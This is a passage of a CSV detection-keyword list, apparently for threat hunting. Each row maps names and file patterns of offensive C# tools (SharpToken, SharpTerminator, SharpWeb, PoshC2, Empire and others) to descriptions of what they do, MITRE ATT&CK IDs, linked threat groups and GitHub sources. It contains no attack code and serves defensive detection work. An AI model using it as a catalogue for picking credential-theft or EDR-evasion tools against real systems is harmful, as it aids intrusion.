Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","N/A","10","10","117","11","2024-09-30T15:21:25Z","2021-07-15T14:50:05Z","59203"
"*SharpSword.exe*",".{0,1000}SharpSword\.exe.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","N/A","8","10","117","11","2024-09-30T15:21:25Z","2021-07-15T14:50:05Z","59204"
"*SharpSword.sln*",".{0,1000}SharpSword\.sln.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","N/A","8","10","117","11","2024-09-30T15:21:25Z","2021-07-15T14:50:05Z","59205"
"*SharpSword-main.*",".{0,1000}SharpSword\-main\..{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","N/A","8","10","117","11","2024-09-30T15:21:25Z","2021-07-15T14:50:05Z","59206"
"*SharpSystemTriggers.git*",".{0,1000}SharpSystemTriggers\.git.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0008 ","N/A","N/A","Lateral Movement","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","N/A","10","5","483","57","2024-05-15T21:24:56Z","2021-09-12T18:18:15Z","59207"
"*SharpSystemTriggers.sln*",".{0,1000}SharpSystemTriggers\.sln.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0008 ","N/A","N/A","Lateral Movement","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","N/A","10","5","483","57","2024-05-15T21:24:56Z","2021-09-12T18:18:15Z","59208"
"*SharpSystemTriggers-main*",".{0,1000}SharpSystemTriggers\-main.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0008 ","N/A","N/A","Lateral Movement","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","N/A","10","5","483","57","2024-05-15T21:24:56Z","2021-09-12T18:18:15Z","59209"
"*SharpTask.exe*",".{0,1000}SharpTask\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59210"
"*sharptelnet *",".{0,1000}sharptelnet\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","59211"
"*SharpTemplateResources/cmd/*",".{0,1000}SharpTemplateResources\/cmd\/.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1099","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","59212"
"*SharpTerminator.exe*",".{0,1000}SharpTerminator\.exe.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","59213"
"*SharpTerminator.git*",".{0,1000}SharpTerminator\.git.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","59214"
"*SharpTerminator.sln*",".{0,1000}SharpTerminator\.sln.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","59215"
"*SharpTerminator-main.zip*",".{0,1000}SharpTerminator\-main\.zip.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","59216"
"*SharpThief.csproj*",".{0,1000}SharpThief\.csproj.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","59217"
"*SharpThief.exe*",".{0,1000}SharpThief\.exe.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","59218"
"*SharpThief.pdb*",".{0,1000}SharpThief\.pdb.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","59219"
"*SharpThief.Properties*",".{0,1000}SharpThief\.Properties.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","59220"
"*SharpThief.resources.dll*",".{0,1000}SharpThief\.resources\.dll.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","59221"
"*SharpThief.resources.exe*",".{0,1000}SharpThief\.resources\.exe.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","59222"
"*SharpThief.sln*",".{0,1000}SharpThief\.sln.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","59223"
"*SharpToken execute*",".{0,1000}SharpToken\sexecute.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","59224"
"*SharpToken* add_user*",".{0,1000}SharpToken.{0,1000}\sadd_user.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","59225"
"*SharpToken* delete_user*",".{0,1000}SharpToken.{0,1000}\sdelete_user.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","59226"
"*SharpToken* enableUser *",".{0,1000}SharpToken.{0,1000}\senableUser\s.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","59227"
"*SharpToken* list_token*",".{0,1000}SharpToken.{0,1000}\slist_token.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","59228"
"*SharpToken* tscon *",".{0,1000}SharpToken.{0,1000}\stscon\s.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","59229"
"*SharpToken.csproj*",".{0,1000}SharpToken\.csproj.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","59230"
"*SharpToken.exe*",".{0,1000}SharpToken\.exe.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","59231"
"*SharpToken.exe*",".{0,1000}SharpToken\.exe.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","59232"
"*SharpToken.git*",".{0,1000}SharpToken\.git.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","59233"
"*SharpToken-main.zip*",".{0,1000}SharpToken\-main\.zip.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","59234"
"*SharpUnhooker.*",".{0,1000}SharpUnhooker\..{0,1000}","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","N/A","9","5","400","80","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z","59235"
"*SharpUnhooker-main*",".{0,1000}SharpUnhooker\-main.{0,1000}","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","N/A","9","5","400","80","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z","59236"
"*SharpUp audit*",".{0,1000}SharpUp\saudit.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","59237"
"*SharpUp.exe*",".{0,1000}SharpUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59238"
"*SharpUp.exe*",".{0,1000}SharpUp\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","59239"
"*SharpUp.exe*",".{0,1000}SharpUp\.exe.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","1","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","59240"
"*SharpUpManager*",".{0,1000}SharpUpManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59241"
"*SharpUpMenu(*",".{0,1000}SharpUpMenu\(.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59242"
"*SharpVeeamDecryptor.exe*",".{0,1000}SharpVeeamDecryptor\.exe.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","1","N/A","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","59243"
"*SharpView.exe*",".{0,1000}SharpView\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta - APT29","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59244"
"*Sharpview.exe*",".{0,1000}Sharpview\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","59245"
"*SharpView.exe*",".{0,1000}SharpView\.exe.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","59246"
"*SharpView\SharpView*",".{0,1000}SharpView\\SharpView.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","59247"
"*SharpView-master*",".{0,1000}SharpView\-master.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","59248"
"*sharpweb all*",".{0,1000}sharpweb\sall.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","59249"
"*SharpWeb.exe -*",".{0,1000}SharpWeb\.exe\s\-.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","N/A","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","59250"
"*SharpWebManager.cs*",".{0,1000}SharpWebManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59251"
"*SharpWebServer.exe*",".{0,1000}SharpWebServer\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59252"
"*SharpWifiGrabber*",".{0,1000}SharpWifiGrabber.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","59253"
"*SharpWifiGrabber.exe*",".{0,1000}SharpWifiGrabber\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59254"
"*sharpwmi action=*",".{0,1000}sharpwmi\saction\=.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","59255"
"*SharpWMI.exe action=*",".{0,1000}SharpWMI\.exe\saction\=.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","59256"
